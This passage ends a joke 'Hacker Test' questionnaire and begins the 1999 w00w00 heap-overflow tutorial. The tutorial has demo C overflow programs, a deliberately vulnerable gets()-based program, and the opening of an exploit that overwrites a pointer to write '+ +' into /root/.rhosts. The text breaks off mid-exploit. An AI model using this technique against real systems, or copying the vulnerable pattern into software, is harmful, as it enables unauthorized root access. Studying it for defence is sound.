| 278 | 0149 Can you convert hex to octal in your head? 279 | 280 | 0150 Do you know how to use a Kleene star? 281 | 282 | 0151 Have you ever starved while dining with philosophers? 283 | 284 | 0152 Have you solved the halting problem? 285 | 0153 ... Correctly? 286 | 287 | 0154 Ever deadlock trying eating spaghetti? 288 | 289 | 0155 Ever written a self-reproducing program? 290 | 291 | 0156 Ever swapped out the swapper? 292 | 293 | 0157 Can you read a state diagram? 294 | 0158 ... Do you need one? 295 | 296 | 0159 Ever create an unkillable program? 297 | 0160 ... Intentionally? 298 | 299 | 0161 Ever been asked for a cookie? 300 | 301 | 0162 Ever speed up a system by removing a jumper? 302 | 303 | * Do you know... 304 | 305 | 0163 Do you know who wrote Rogue? 306 | 0164 ... Rogomatic? 307 | 308 | 0165 Do you know Gray code? 309 | 310 | 0166 Do you know what HCF means? 311 | 0167 ... Ever use it? 312 | 0168 ... Intentionally? 313 | 314 | 0169 Do you know what a lace card is? 315 | 0170 ... Ever make one? 316 | 317 | 0171 Do you know the end of the epoch? 
318 | 0172 ... Have you celebrated the end of an epoch? 319 | 0173 ... Did you have to rewrite code? 320 | 321 | 0174 Do you know the difference between DTE and DCE? 322 | 323 | 0175 Do you know the RS-232C pinout? 324 | 0176 ... Can you wire a connector without looking? 325 | 326 | * Do you have... 327 | 328 | 0177 Do you have a copy of Dec Wars? 329 | 0178 Do you have the Canonical Collection of Lightbulb Jokes? 330 | 0179 Do you have a copy of the Hacker's dictionary? 331 | 0180 ... Did you contribute to it? 332 | 333 | 0181 Do you have a flowchart template? 334 | 0182 ... Is it unused? 335 | 336 | 0183 Do you have your own fortune-cookie file? 337 | 338 | 0184 Do you have the Anarchist's Cookbook? 339 | 0185 ... Ever make anything from it? 340 | 341 | 0186 Do you own a modem? 342 | 0187 ... a terminal? 343 | 0188 ... a toy computer? 344 | 0189 ... a personal computer? 345 | 0190 ... a minicomputer? 346 | 0191 ... a mainframe? 347 | 0192 ... a supercomputer? 348 | 0193 ... a hypercube? 349 | 0194 ... a printer? 350 | 0195 ... a laser printer? 351 | 0196 ... a tape drive? 352 | 0197 ... an outmoded peripheral device? 353 | 354 | 0198 Do you have a programmable calculator? 355 | 0199 ... Is it RPN? 356 | 357 | 0200 Have you ever owned more than 1 computer? 358 | 0201 ... 4 computers? 359 | 0202 ... 16 computers? 360 | 361 | 0203 Do you have a SLIP line? 362 | 0204 ... a T1 line? 363 | 364 | 0205 Do you have a separate phone line for your terminal/computer? 365 | 0206 ... Is it legal? 366 | 367 | 0207 Do you have core memory? 368 | 0208 ... drum storage? 369 | 0209 ... bubble memory? 370 | 371 | 0210 Do you use more than 16 megabytes of disk space? 372 | 0211 ... 256 megabytes? 373 | 0212 ... 1 gigabyte? 374 | 0213 ... 16 gigabytes? 375 | 0214 ... 256 gigabytes? 376 | 0215 ... 1 terabyte? 377 | 378 | 0216 Do you have an optical disk/disk drive? 379 | 380 | 0217 Do you have a personal magnetic tape library? 381 | 0218 ... Is it unlabelled? 382 | 383 | 0219 Do you own more than 16 floppy disks? 384 | 0220 ... 64 floppy disks? 385 | 0221 ... 256 floppy disks? 386 | 0222 ... 1024 floppy disks? 387 | 388 | 0223 Do you have any 8-inch disks? 389 | 390 | 0224 Do you have an internal stack? 391 | 392 | 0225 Do you have a clock interrupt? 393 | 394 | 0226 Do you own volumes 1 to 3 of _The Art of Computer Programming_? 395 | 0227 ... Have you done all the exercises? 396 | 0228 ... Do you have a MIX simulator? 397 | 0229 ... Can you name the unwritten volumes? 398 | 399 | 0230 Can you quote from _The Mythical Man-month_? 400 | 0231 ... Did you participate in the OS/360 project? 401 | 402 | 0232 Do you have a TTL handbook? 403 | 404 | 0233 Do you have printouts more than three years old? 405 | 406 | * Career 407 | 408 | 0234 Do you have a job? 409 | 0235 ... Have you ever had a job? 410 | 0236 ... Was it computer-related? 411 | 412 | 0237 Do you work irregular hours? 413 | 414 | 0238 Have you ever been a system administrator? 415 | 416 | 0239 Do you have more megabytes than megabucks? 417 | 418 | 0240 Have you ever downgraded your job to upgrade your processing power? 419 | 420 | 0241 Is your job secure? 421 | 0242 ... Do you have code to prove it? 422 | 423 | 0243 Have you ever had a security clearance? 424 | 425 | * Games 426 | 427 | 0244 Have you ever played Pong? 428 | 429 | Have you ever played 430 | 0246 ... Spacewar? 431 | 0247 ... Star Trek? 432 | 0248 ... Wumpus? 433 | 0249 ... Lunar Lander? 434 | 0250 ... Empire? 435 | 436 | Have you ever beaten 437 | 0251 ... Moria 4.8? 438 | 0252 ... 
Rogue 3.6? 439 | 0253 ... Rogue 5.3? 440 | 0254 ... Larn? 441 | 0255 ... Hack 1.0.3? 442 | 0256 ... Nethack 2.4? 443 | 444 | 0257 Can you get a better score on Rogue than Rogomatic? 445 | 446 | 0258 Have you ever solved Adventure? 447 | 0259 ... Zork? 448 | 449 | 0260 Have you ever written any redcode? 450 | 451 | 0261 Have you ever written an adventure program? 452 | 0262 ... a real-time game? 453 | 0263 ... a multi-player game? 454 | 0264 ... a networked game? 455 | 456 | 0265 Can you out-doctor Eliza? 457 | 458 | * Hardware 459 | 460 | 0266 Have you ever used a light pen? 461 | 0267 ... did you build it? 462 | 463 | Have you ever used 464 | 0268 ... a teletype? 465 | 0269 ... a paper tape? 466 | 0270 ... a decwriter? 467 | 0271 ... a card reader/punch? 468 | 0272 ... a SOL? 469 | 470 | Have you ever built 471 | 0273 ... an Altair? 472 | 0274 ... a Heath/Zenith computer? 473 | 474 | Do you know how to use 475 | 0275 ... an oscilliscope? 476 | 0276 ... a voltmeter? 477 | 0277 ... a frequency counter? 478 | 0278 ... a logic probe? 479 | 0279 ... a wirewrap tool? 480 | 0280 ... a soldering iron? 481 | 0281 ... a logic analyzer? 482 | 483 | 0282 Have you ever designed an LSI chip? 484 | 0283 ... has it been fabricated? 485 | 486 | 0284 Have you ever etched a printed circuit board? 487 | 488 | * Historical 489 | 490 | 0285 Have you ever toggled in boot code on the front panel? 491 | 0286 ... from memory? 492 | 493 | 0287 Can you program an Eniac? 494 | 495 | 0288 Ever seen a 90 column card? 496 | 497 | * IBM 498 | 499 | 0289 Do you recite IBM part numbers in your sleep? 500 | 0290 Do you know what IBM part number 7320154 is? 501 | 502 | 0291 Do you understand 3270 data streams? 503 | 504 | 0292 Do you know what the VM privilege classes are? 505 | 506 | 0293 Have you IPLed an IBM off the tape drive? 507 | 0294 ... off a card reader? 508 | 509 | 0295 Can you sing something from the IBM Songbook? 510 | 511 | * Languages 512 | 513 | 0296 Do you know more than 4 programming languages? 514 | 0297 ... 8 languages? 515 | 0298 ... 16 languages? 516 | 0299 ... 32 languages? 517 | 518 | 0300 Have you ever designed a programming language? 519 | 520 | 0301 Do you know what Basic stands for? 521 | 0302 ... Pascal? 522 | 523 | 0303 Can you program in Basic? 524 | 0304 ... Do you admit it? 525 | 526 | 0305 Can you program in Cobol? 527 | 0306 ... Do you deny it? 528 | 529 | 0307 Do you know Pascal? 530 | 0308 ... Modula-2? 531 | 0309 ... Oberon? 532 | 0310 ... More that two Wirth languages? 533 | 0311 ... Can you recite a Nicklaus Wirth joke? 534 | 535 | 0312 Do you know Algol-60? 536 | 0313 ... Algol-W? 537 | 0314 ... Algol-68? 538 | 0315 ... Do you understand the Algol-68 report? 539 | 0316 ... Do you like two-level grammars? 540 | 541 | 0317 Can you program in assembler on 2 different machines? 542 | 0318 ... on 4 different machines? 543 | 0319 ... on 8 different machines? 544 | 545 | Do you know 546 | 0320 ... APL? 547 | 0321 ... Ada? 548 | 0322 ... BCPL? 549 | 0323 ... C++? 550 | 0324 ... C? 551 | 0325 ... Comal? 552 | 0326 ... Eiffel? 553 | 0327 ... Forth? 554 | 0328 ... Fortran? 555 | 0329 ... Hypertalk? 556 | 0330 ... Icon? 557 | 0331 ... Lisp? 558 | 0332 ... Logo? 559 | 0333 ... MIIS? 560 | 0334 ... MUMPS? 561 | 0335 ... PL/I? 562 | 0336 ... Pilot? 563 | 0337 ... Plato? 564 | 0338 ... Prolog? 565 | 0339 ... RPG? 566 | 0340 ... Rexx (or ARexx)? 567 | 0341 ... SETL? 568 | 0342 ... Smalltalk? 569 | 0343 ... Snobol? 570 | 0344 ... VHDL? 571 | 0345 ... any assembly language? 
572 | 573 | 0346 Can you talk VT-100? 574 | 0347 ... Postscript? 575 | 0348 ... SMTP? 576 | 0349 ... UUCP? 577 | 0350 ... English? 578 | 579 | * Micros 580 | 581 | 0351 Ever copy a copy-protected disk? 582 | 0352 Ever create a copy-protection scheme? 583 | 584 | 0353 Have you ever made a "flippy" disk? 585 | 586 | 0354 Have you ever recovered data from a damaged disk? 587 | 588 | 0355 Ever boot a naked floppy? 589 | 590 | * Networking 591 | 592 | 0356 Have you ever been logged in to two different timezones at once? 593 | 594 | 0357 Have you memorized the UUCP map for your country? 595 | 0358 ... For any country? 596 | 597 | 0359 Have you ever found a sendmail bug? 598 | 0360 ... Was it a security hole? 599 | 600 | 0361 Have you memorized the HOSTS.TXT table? 601 | 0362 ... Are you up to date? 602 | 603 | 0363 Can you name all the top-level nameservers and their addresses? 604 | 605 | 0364 Do you know RFC-822 by heart? 606 | 0365 ... Can you recite all the errors in it? 607 | 608 | 0366 Have you written a Sendmail configuration file? 609 | 0367 ... Does it work? 610 | 0368 ... Do you mumble "defocus" in your sleep? 611 | 612 | 0369 Do you know the max packet lifetime? 613 | 614 | * Operating systems 615 | 616 | Can you use 617 | 0370 ... BSD Unix? 618 | 0371 ... non-BSD Unix? 619 | 0372 ... AIX 620 | 0373 ... VM/CMS? 621 | 0374 ... VMS? 622 | 0375 ... MVS? 623 | 0376 ... VSE? 624 | 0377 ... RSTS/E? 625 | 0378 ... CP/M? 626 | 0379 ... COS? 627 | 0380 ... NOS? 628 | 0381 ... CP-67? 629 | 0382 ... RT-11? 630 | 0383 ... MS-DOS? 631 | 0384 ... Finder? 632 | 0385 ... PRODOS? 633 | 0386 ... more than one OS for the TRS-80? 634 | 0387 ... Tops-10? 635 | 0388 ... Tops-20? 636 | 0389 ... OS-9? 637 | 0390 ... OS/2? 638 | 0391 ... AOS/VS? 639 | 0392 ... Multics? 640 | 0393 ... ITS? 641 | 0394 ... Vulcan? 642 | 643 | 0395 Have you ever paged or swapped off a tape drive? 644 | 0396 ... Off a card reader/punch? 645 | 0397 ... Off a teletype? 646 | 0398 ... Off a networked (non-local) disk? 647 | 648 | 0399 Have you ever found an operating system bug? 649 | 0400 ... Did you exploit it? 650 | 0401 ... Did you report it? 651 | 0402 ... Was your report ignored? 652 | 653 | 0403 Have you ever crashed a machine? 654 | 0404 ... Intentionally? 655 | 656 | * People 657 | 658 | 0405 Do you know any people? 659 | 0406 ... more than one? 660 | 0407 ... more than two? 661 | 662 | * Personal 663 | 664 | 0408 Are your shoelaces untied? 665 | 666 | 0409 Do you interface well with strangers? 667 | 668 | 0410 Are you able to recite phone numbers for half-a-dozen computer systems 669 | but unable to recite your own? 670 | 671 | 0411 Do you log in before breakfast? 672 | 673 | 0412 Do you consume more than LD-50 caffeine a day? 674 | 675 | 0413 Do you answer either-or questions with "yes"? 676 | 677 | 0414 Do you own an up-to-date copy of any operating system manual? 678 | 0415 ... *every* operating system manual? 679 | 680 | 0416 Do other people have difficulty using your customized environment? 681 | 682 | 0417 Do you dream in any programming languages? 683 | 684 | 0418 Do you have difficulty focusing on three-dimensional objects? 685 | 686 | 0419 Do you ignore mice? 687 | 688 | 0420 Do you despise the CAPS LOCK key? 689 | 690 | 0421 Do you believe menus belong in restaurants? 691 | 692 | 0422 Do you have a Mandelbrot hanging on your wall? 693 | 694 | 0423 Have you ever decorated with magnetic tape or punched cards? 695 | 0424 Do you have a disk platter or a naked floppy hanging in your home? 
696 | 697 | 0425 Have you ever seen the dawn? 698 | 0426 ... Twice in a row? 699 | 700 | 0427 Do you use "foobar" in daily conversation? 701 | 0428 ... "bletch"? 702 | 703 | 0429 Do you use the "P convention"? 704 | 705 | 0430 Do you automatically respond to any user question with RTFM? 706 | 0431 ... Do you know what it means? 707 | 708 | 0432 Do you think garbage collection means memory management? 709 | 710 | 0433 Do you have problems allocating horizontal space in your room/office? 711 | 712 | 0434 Do you read Scientific American in bars to pick up women? 713 | 714 | 0435 Is your license plate computer-related? 715 | 716 | 0436 Have you ever taken the Purity test? 717 | 718 | 0437 Ever have an out-of-CPU experience? 719 | 720 | 0438 Have you ever set up a blind date over the computer? 721 | 722 | 0439 Do you talk to the person next to you via computer? 723 | 724 | * Programming 725 | 726 | 0440 Can you write a Fortran compiler? 727 | 0441 ... In TECO? 728 | 729 | 0442 Can you read a machine dump? 730 | 0443 Can you disassemble code in your head? 731 | 732 | Have you ever written 733 | 0444 ... a compiler? 734 | 0445 ... an operating system? 735 | 0446 ... a device driver? 736 | 0447 ... a text processor? 737 | 0448 ... a display hack? 738 | 0449 ... a database system? 739 | 0450 ... an expert system? 740 | 0451 ... an edge detector? 741 | 0452 ... a real-time control system? 742 | 0453 ... an accounting package? 743 | 0454 ... a virus? 744 | 0455 ... a prophylactic? 745 | 746 | 0456 Have you ever written a biorhythm program? 747 | 0457 ... Did you sell the output? 748 | 0458 ... Was the output arbitrarily invented? 749 | 750 | 0459 Have you ever computed pi to more than a thousand decimal places? 751 | 0460 ... the number e? 752 | 753 | 0461 Ever find a prime number of more than a hundred digits? 754 | 755 | 0462 Have you ever written self-modifying code? 756 | 0463 ... Are you proud of it? 757 | 758 | 0464 Did you ever write a program that ran correctly the first time? 759 | 0465 ... Was it longer than 20 lines? 760 | 0466 ... 100 lines? 761 | 0467 ... Was it in assembly language? 762 | 0468 ... Did it work the second time? 763 | 764 | 0469 Can you solve the Towers of Hanoi recursively? 765 | 0470 ... Non-recursively? 766 | 0471 ... Using the Troff text formatter? 767 | 768 | 0472 Ever submit an entry to the Obfuscated C code contest? 769 | 0473 ... Did it win? 770 | 0474 ... Did your entry inspire a new rule? 771 | 772 | 0475 Do you know Duff's device? 773 | 774 | 0476 Do you know Jensen's device? 775 | 776 | 0477 Ever spend ten minutes trying to find a single-character error? 777 | 0478 ... More than an hour? 778 | 0479 ... More than a day? 779 | 0480 ... More than a week? 780 | 0481 ... Did the first person you show it to find it immediately? 781 | 782 | * Unix 783 | 784 | 0482 Can you use Berkeley Unix? 785 | 0483 .. Non-Berkeley Unix? 786 | 787 | 0484 Can you distinguish between sections 4 and 5 of the Unix manual? 788 | 789 | 0485 Can you find TERMIO in the System V release 2 documentation? 790 | 791 | 0486 Have you ever mounted a tape as a Unix file system? 792 | 793 | 0487 Have you ever built Minix? 794 | 795 | 0488 Can you answer "quiz function ed-command" correctly? 796 | 0489 ... How about "quiz ed-command function"? 797 | 798 | * Usenet 799 | 800 | 0490 Do you read news? 801 | 0491 ... More than 32 newsgroups? 802 | 0492 ... More than 256 newsgroups? 803 | 0493 ... All the newsgroups? 804 | 805 | 0494 Have you ever posted an article? 806 | 0495 ... Do you post regularly? 
807 | 808 | 0496 Have you ever posted a flame? 809 | 0497 ... Ever flame a cross-posting? 810 | 0498 ... Ever flame a flame? 811 | 0499 ... Do you flame regularly? 812 | 813 | 0500 Ever have your program posted to a source newsgroup? 814 | 815 | 0501 Ever forge a posting? 816 | 0502 Ever form a new newsgroup? 817 | 0503 ... Does it still exist? 818 | 819 | 0504 Do you remember 820 | 0505 ... mod.ber? 821 | 0506 ... the Stupid People's Court? 822 | 0507 ... Bandy-grams? 823 | 824 | * Phreaking 825 | 826 | 0508 Have you ever built a black box? 827 | 828 | 0509 Can you name all of the 'colors' of boxes? 829 | 0510 ... and their associated functions? 830 | 831 | 0511 Does your touch tone phone have 16 DTMF buttons on it? 832 | 833 | 0512 Did the breakup of MaBell create more opportunities for you? 834 | 835 | 836 | If you have any comments of suggestions regarding the HACKER TEST, 837 | Please send then to: hayes@psunuce.bitnet 838 | or jwh100@psuvm.bitnet / jwh100@psuvmxa.bitnet 839 | or jwh100@psuvm.psu.edu / jwh100@psuvmxa.psu.edu 840 | or ...!psuvax1!psuvm.bitnet!jwh100 841 | 842 | -------------------------------------------------------------------------------- /heaptut.txt: -------------------------------------------------------------------------------- 1 | Subject: w00w00 on Heap Overflows 2 | 3 | This is a PRELIMINARY BETA VERSION of our final article! We apologize for 4 | any mistakes. We still need to add a few more things. 5 | 6 | [ Note: You may also get this article off of ] 7 | [ http://www.w00w00.org/articles.html. ] 8 | 9 | w00w00 on Heap Overflows 10 | By: Matt Conover & w00w00 Security Team 11 | 12 | ------------------------------------------------------------------------------ 13 | Copyright (C) January 1999, Matt Conover & w00w00 Security Development 14 | 15 | You may freely redistribute or republish this article, provided the 16 | following conditions are met: 17 | 18 | 1. This article is left intact (no changes made, the full article 19 | published, etc.) 20 | 21 | 2. Proper credit is given to its authors; Matt Conover and the 22 | w00w00 Security Development (WSD). 23 | 24 | You are free to rewrite your own articles based on this material (assuming 25 | the above conditions are met). It'd also be appreciated if an e-mail is 26 | sent to either mattc@repsec.com or shok@dataforce.net to let us know you 27 | are going to be republishing this article or writing an article based upon 28 | one of our ideas. 29 | 30 | ------------------------------------------------------------------------------ 31 | 32 | Prelude: 33 | Heap/BSS-based overflows are fairly common in applications today; yet, 34 | they are rarely reported. Therefore, we felt it was appropriate to 35 | present a "heap overflow" tutorial. The biggest critics of this article 36 | will probably be those who argue heap overflows have been around for a 37 | while. Of course they have, but that doesn't negate the need for such 38 | material. 39 | 40 | In this article, we will refer to "overflows involving the stack" as 41 | "stack-based overflows" ("stack overflow" is misleading) and "overflows 42 | involving the heap" as "heap-based overflows". 43 | 44 | This article should provide the following: a better understanding 45 | of heap-based overflows along with several methods of exploitation, 46 | demonstrations, and some possible solutions/fixes. Prerequisites to 47 | this article: a general understanding of computer architecture, 48 | assembly, C, and stack overflows. 
49 | 50 | This is a collection of the insights we have gained through our research 51 | with heap-based overflows and the like. We have written all the 52 | examples and exploits included in this article; therefore, the copyright 53 | applies to them as well. 54 | 55 | 56 | Why Heap/BSS Overflows are Significant 57 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 58 | As more system vendors add non-executable stack patches, or individuals 59 | apply their own patches (e.g., Solar Designer's non-executable stack 60 | patch), a different method of penetration is needed by security 61 | consultants (or else, we won't have jobs!). Let me give you a few 62 | examples: 63 | 64 | 1. Searching for the word "heap" on BugTraq (for the archive, see 65 | www.geek-girl.com/bugtraq), yields only 40+ matches, whereas 66 | "stack" yields 2300+ matches (though several are irrelevant). Also, 67 | "stack overflow" gives twice as many matches as "heap" does. 68 | 69 | 2. Solaris (an OS developed by Sun Microsystems), as of Solaris 70 | 2.6, sparc Solaris includes a "protect_stack" option, but not an 71 | equivalent "protect_heap" option. Fortunately, the bss is not 72 | executable (and need not be). 73 | 74 | 3. There is a "StackGuard" (developed by Crispin Cowan et. al.), but 75 | no equivalent "HeapGuard". 76 | 77 | 4. Using a heap/bss-based overflow was one of the "potential" methods 78 | of getting around StackGuard. The following was posted to BugTraq 79 | by Tim Newsham several months ago: 80 | 81 | > Finally the precomputed canary values may be a target 82 | > themselves. If there is an overflow in the data or bss segments 83 | > preceding the precomputed canary vector, an attacker can simply 84 | > overwrite all the canary values with a single value of his 85 | > choosing, effectively turning off stack protection. 86 | 87 | 5. Some people have actually suggested making a "local" buffer a 88 | "static" buffer, as a fix! This not very wise; yet, it is a fairly 89 | common misconception of how the heap or bss work. 90 | 91 | Although heap-based overflows are not new, they don't seem to be well 92 | understood. 93 | 94 | Note: 95 | One argument is that the presentation of a "heap-based overflow" is 96 | equivalent to a "stack-based overflow" presentation. However, only a 97 | small proportion of this article has the same presentation (if you 98 | will) that is equivalent to that of a "stack-based overflow". 99 | 100 | People go out of their way to prevent stack-based overflows, but leave 101 | their heaps/bss' completely open! On most systems, both heap and bss are 102 | both executable and writeable (an excellent combination). This makes 103 | heap/bss overflows very possible. But, I don't see any reason for the 104 | bss to be executable! What is going to be executed in zero-filled 105 | memory?! 106 | 107 | For the security consultant (the ones doing the penetration assessment), 108 | most heap-based overflows are system and architecture independent, 109 | including those with non-executable heaps. This will all be demonstrated 110 | in the "Exploiting Heap/BSS Overflows" section. 111 | 112 | Terminology 113 | ~~~~~~~~~~~ 114 | An executable file, such as ELF (Executable and Linking Format) 115 | executable, has several "sections" in the executable file, such as: the 116 | PLT (Procedure Linking Table), GOT (Global Offset Table), init 117 | (instructions executed on initialization), fini (instructions to be 118 | executed upon termination), and ctors and dtors (contains global 119 | constructors/destructors). 
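For the rest of this article, the regions that matter most are the data
section, the bss, the heap, and the stack, which the next section describes.
As a quick added illustration (this is not one of the original w00w00
example programs), the short program below prints an address from a variable
in each of those regions. Exact values vary from system to system, but on a
typical 32-bit Linux/x86 box you should see the data and bss addresses
lowest, the heap slightly above them, and the stack much higher.
-----------------------------------------------------------------------------
/* added illustration: print one address from each memory region */

#include <stdio.h>
#include <stdlib.h>

int data_var = 42;        /* initialized global -> data section */
int bss_var;              /* uninitialized global -> bss section */

int main(void)
{
   int stack_var;                      /* local variable -> stack */
   char *heap_var = malloc(16);        /* dynamically allocated -> heap */

   printf("data  : %p\n", (void *)&data_var);
   printf("bss   : %p\n", (void *)&bss_var);
   printf("heap  : %p\n", (void *)heap_var);
   printf("stack : %p\n", (void *)&stack_var);

   free(heap_var);
   return 0;
}
-----------------------------------------------------------------------------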
120 | 121 | 122 | "Memory that is dynamically allocated by the application is known as the 123 | heap." The words "by the application" are important here, as on good 124 | systems most areas are in fact dynamically allocated at the kernel level, 125 | while for the heap, the allocation is requested by the application. 126 | 127 | Heap and Data/BSS Sections 128 | ~~~~~~~~~~~~~~~~~~~~~~~~~~ 129 | The heap is an area in memory that is dynamically allocated by the 130 | application. The data section initialized at compile-time. 131 | 132 | The bss section contains uninitialized data, and is allocated at 133 | run-time. Until it is written to, it remains zeroed (or at least from 134 | the application's point-of-view). 135 | 136 | Note: 137 | When we refer to a "heap-based overflow" in the sections below, we are 138 | most likely referring to buffer overflows of both the heap and data/bss 139 | sections. 140 | 141 | On most systems, the heap grows up (towards higher addresses). Hence, 142 | when we say "X is below Y," it means X is lower in memory than Y. 143 | 144 | 145 | Exploiting Heap/BSS Overflows 146 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 147 | In this section, we'll cover several different methods to put heap/bss 148 | overflows to use. Most of examples for Unix-dervied x86 systems, will 149 | also work in DOS and Windows (with a few changes). We've also included 150 | a few DOS/Windows specific exploitation methods. An advanced warning: 151 | this will be the longest section, and should be studied the most. 152 | 153 | Note: 154 | In this article, I use the "exact offset" approach. The offset 155 | must be closely approximated to its actual value. The alternative is 156 | "stack-based overflow approach" (if you will), where one repeats the 157 | addresses to increase the likelihood of a successful exploit. 158 | 159 | While this example may seem unnecessary, we're including it for those who 160 | are unfamiliar with heap-based overflows. Therefore, we'll include this 161 | quick demonstration: 162 | ----------------------------------------------------------------------------- 163 | /* demonstrates dynamic overflow in heap (initialized data) */ 164 | 165 | #include 166 | #include 167 | #include 168 | #include 169 | 170 | #define BUFSIZE 16 171 | #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */ 172 | 173 | int main() 174 | { 175 | u_long diff; 176 | char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE); 177 | 178 | diff = (u_long)buf2 - (u_long)buf1; 179 | printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2, diff); 180 | 181 | memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0'; 182 | 183 | printf("before overflow: buf2 = %s\n", buf2); 184 | memset(buf1, 'B', (u_int)(diff + OVERSIZE)); 185 | printf("after overflow: buf2 = %s\n", buf2); 186 | 187 | return 0; 188 | } 189 | ----------------------------------------------------------------------------- 190 | 191 | If we run this, we'll get the following: 192 | [root /w00w00/heap/examples/basic]# ./heap1 8 193 | buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes 194 | before overflow: buf2 = AAAAAAAAAAAAAAA 195 | after overflow: buf2 = BBBBBBBBAAAAAAA 196 | 197 | This works because buf1 overruns its boundaries into buf2's heap space. 198 | But, because buf2's heap space is still valid (heap) memory, the program 199 | doesn't crash. 
200 | 201 | Note: 202 | A possible fix for a heap-based overflow, which will be mentioned 203 | later, is to put "canary" values between all variables on the heap 204 | space (like that of StackGuard mentioned later) that mustn't be changed 205 | throughout execution. 206 | 207 | You can get the complete source to all examples used in this article, 208 | from the file attachment, heaptut.tgz. You can also download this from 209 | our article archive at http://www.w00w00.org/articles.html. 210 | 211 | Note: 212 | To demonstrate a bss-based overflow, change line: 213 | from: 'char *buf = malloc(BUFSIZE)', to: 'static char buf[BUFSIZE]' 214 | 215 | Yes, that was a very basic example, but we wanted to demonstrate a heap 216 | overflow at its most primitive level. This is the basis of almost 217 | all heap-based overflows. We can use it to overwrite a filename, a 218 | password, a saved uid, etc. Here is a (still primitive) example of 219 | manipulating pointers: 220 | ----------------------------------------------------------------------------- 221 | /* demonstrates static pointer overflow in bss (uninitialized data) */ 222 | 223 | #include 224 | #include 225 | #include 226 | #include 227 | #include 228 | 229 | #define BUFSIZE 16 230 | #define ADDRLEN 4 /* # of bytes in an address */ 231 | 232 | int main() 233 | { 234 | u_long diff; 235 | static char buf[BUFSIZE], *bufptr; 236 | 237 | bufptr = buf, diff = (u_long)&bufptr - (u_long)buf; 238 | 239 | printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", 240 | &bufptr, bufptr, buf, diff, diff); 241 | 242 | memset(buf, 'A', (u_int)(diff + ADDRLEN)); 243 | 244 | printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", 245 | &bufptr, bufptr, buf, diff, diff); 246 | 247 | return 0; 248 | } 249 | ----------------------------------------------------------------------------- 250 | 251 | The results: 252 | [root /w00w00/heap/examples/basic]# ./heap3 253 | bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes 254 | bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes 255 | 256 | When run, one clearly sees that the pointer now points to a different 257 | address. Uses of this? One example is that we could overwrite a 258 | temporary filename pointer to point to a separate string (such as 259 | argv[1], which we could supply ourselves), which could contain 260 | "/root/.rhosts". Hopefully, you are starting to see some potential uses. 261 | 262 | To demonstrate this, we will use a temporary file to momentarily save 263 | some input from the user. This is our finished "vulnerable program": 264 | ----------------------------------------------------------------------------- 265 | /* 266 | * This is a typical vulnerable program. It will store user input in a 267 | * temporary file. 268 | * 269 | * Compile as: gcc -o vulprog1 vulprog1.c 270 | */ 271 | 272 | #include 273 | #include 274 | #include 275 | #include 276 | #include 277 | 278 | #define ERROR -1 279 | #define BUFSIZE 16 280 | 281 | /* 282 | * Run this vulprog as root or change the "vulfile" to something else. 283 | * Otherwise, even if the exploit works, it won't have permission to 284 | * overwrite /root/.rhosts (the default "example"). 
285 | */ 286 | 287 | int main(int argc, char **argv) 288 | { 289 | FILE *tmpfd; 290 | static char buf[BUFSIZE], *tmpfile; 291 | 292 | if (argc <= 1) 293 | { 294 | fprintf(stderr, "Usage: %s \n", argv[0]); 295 | exit(ERROR); 296 | } 297 | 298 | tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */ 299 | printf("before: tmpfile = %s\n", tmpfile); 300 | 301 | printf("Enter one line of data to put in %s: ", tmpfile); 302 | gets(buf); 303 | 304 | printf("\nafter: tmpfile = %s\n", tmpfile); 305 | 306 | tmpfd = fopen(tmpfile, "w"); 307 | if (tmpfd == NULL) 308 | { 309 | fprintf(stderr, "error opening %s: %s\n", tmpfile, 310 | strerror(errno)); 311 | 312 | exit(ERROR); 313 | } 314 | 315 | fputs(buf, tmpfd); 316 | fclose(tmpfd); 317 | } 318 | 319 | ----------------------------------------------------------------------------- 320 | 321 | The aim of this "example" program is to demonstrate that something of 322 | this nature can easily occur in programs (although hopefully not setuid 323 | or root-owned daemon servers). 324 | 325 | And here is our exploit for the vulnerable program: 326 | ----------------------------------------------------------------------------- 327 | /* 328 | * Copyright (C) January 1999, Matt Conover & WSD 329 | * 330 | * This will exploit vulprog1.c. It passes some arguments to the 331 | * program (that the vulnerable program doesn't use). The vulnerable 332 | * program expects us to enter one line of input to be stored 333 | * temporarily. However, because of a static buffer overflow, we can 334 | * overwrite the temporary filename pointer, to have it point to 335 | * argv[1] (which we could pass as "/root/.rhosts"). Then it will 336 | * write our temporary line to this file. So our overflow string (what 337 | * we pass as our input line) will be: 338 | * + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address 339 | * 340 | * We use "+ +" (all hosts), followed by '#' (comment indicator), to 341 | * prevent our "attack code" from causing problems. Without the 342 | * "#", programs using .rhosts would misinterpret our attack code. 343 | * 344 | * Compile as: gcc -o exploit1 exploit1.c 345 | */ 346 | 347 | #include 348 | #include 349 | #include 350 | #include 351 | 352 | #define BUFSIZE 256 353 | 354 | #define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */ 355 | 356 | #define VULPROG "./vulprog1" 357 | #define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */ 358 | 359 | /* get value of sp off the stack (used to calculate argv[1] address) */ 360 | u_long getesp() 361 | { 362 | __asm__("movl %esp,%eax"); /* equiv. 
